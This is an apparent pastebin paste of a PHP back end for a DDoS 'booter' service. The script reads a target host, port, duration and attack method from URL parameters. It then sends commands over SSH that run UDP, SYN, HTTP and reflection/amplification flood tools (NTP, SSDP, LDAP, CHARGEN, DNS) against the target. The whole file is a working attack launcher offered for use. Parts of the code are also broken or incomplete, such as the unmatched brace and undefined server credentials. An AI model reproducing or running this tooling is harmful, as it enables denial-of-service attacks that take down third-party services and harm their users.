Luz7i6sp

· 5 years ago · Jun 19, 2020, 05:24 PM
1<?php
2    // HANDLE API KEY //
3
4        die(/*"ERR: INVALID KEY" *DEBUG* */);
5    }
6
7    if (isset($_GET['host'], $_GET['port'], $_GET['time'], $_GET['method'])) {
8
9        // SANITIZING VARIABLES //
10        $port = (int)$_GET['port'] > 0 && (int)$_GET['port'] < 65536 ? $_GET['port'] : 80;
11        $port = preg_replace('/\D/', '', $port);
12        $ip = preg_match('/^[a-zA-Z0-9\.-_]+$/', $_GET['host']) ? $_GET['host'] : die();
13        $time = (int)$_GET['time'] > 0 && (int)$_GET['time'] < (60*60) ? (int)$_GET['time'] : 30;
14        $time = preg_replace('/\D/', '', $time);
15        $domain = $_GET['host'];
16
17        if(!filter_var($domain, FILTER_VALIDATE_URL) && !filter_var($domain, FILTER_VALIDATE_IP)) {
18            die(/*"Invalid Domain" *DEBUG* */);
19        }
20
21        $smIP = str_replace(".", "", $ip);
22        $smDomain = str_replace(".", "", $domain);
23        $smDomain = str_replace("http://", "", $smDomain);
24
25        // HANDLING SSH ATTACK COMMAND EXECUTION //
26        if($_GET['method'] == "UDP") { $command = "screen -dmS {$smIP} ./udp {$ip} {$port} 1 500 3 {$time}"; }
27        elseif($_GET['method'] == "LDAP") { $command = "screen -dmS {$smIP} ./ldap {$ip} {$port} ldapx.txt 15 -1 {$time}"; }
28        elseif($_GET['method'] == "DOMINATE") { $command = "screen -dmS {$smIP} ./dominate {$ip} {$port} 3 -1 {$time}"; }
29        elseif($_GET['method'] == "XSYN") { $command = "screen -dmS {$smIP} ./xsyn {$ip} {$port} 3 {$time}"; }
30        elseif($_GET['method'] == "SSDP") { $command = "screen -dmS {$smIP} ./ssdp {$ip} {$port} ssdp.txt 3 {$time}"; }
31        elseif($_GET['method'] == "CHARGEN") { $command = "screen -dmS {$smIP} ./chargen {$ip} {$port} chargen.txt 8 -1 {$time}"; }
32        elseif($_GET['method'] == "NTP") { $command = "screen -dmS {$smIP} ./ntp {$ip} {$port} ntp.txt 3 {$time}"; }
33        elseif($_GET['method'] == "VSE") { $command = "screen -dmS {$smIP} ./vse {$ip} 3 -1 {$time}"; }
34        elseif($_GET['method'] == "RUDY") { $command = "screen -dmS {$smIP} ./rudy {$ip} 1 8 {$time} proxies.txt 0"; }
35        elseif($_GET['method'] == "GET") { $command = "screen -dmS {$smIP} ./ghp {$ip} GET 1 8 {$time} proxies.txt 0"; }
36        elseif($_GET['method'] == "DNS") { $command = "screen -dmS {$smIP} ./dns{$ip} {$port} ssdp.txt 3 {$time}"; }
37        elseif($_GET['method'] == "SUDP") { $command = "screen -dmS {$smIP} ./sudp {$ip}{$port} 1 3 {$time}"; }
38        elseif($_GET['method'] == "STOP") { $command = "screen -X -s {$smIP} quit"; }
39        else die();
40
41        // SERVER CONNECTION HANDLING //
42 
43        $conn = ssh2_connect($server, 22);
44        if (!$conn) {
45            die("CONN ERR");
46        }
47
48
49
50
51        // AUTHENTICATION CLAUSE //
52        if (ssh2_auth_password($conn, $username, $password)) {
53            /*echo "200 OK."; *DEBUG* */
54        } else {
55            die(/*'SSH Authentication Failed...' *DEBUG* */);
56        }
57
58        ssh2_exec($conn, $command);
59    }
60?>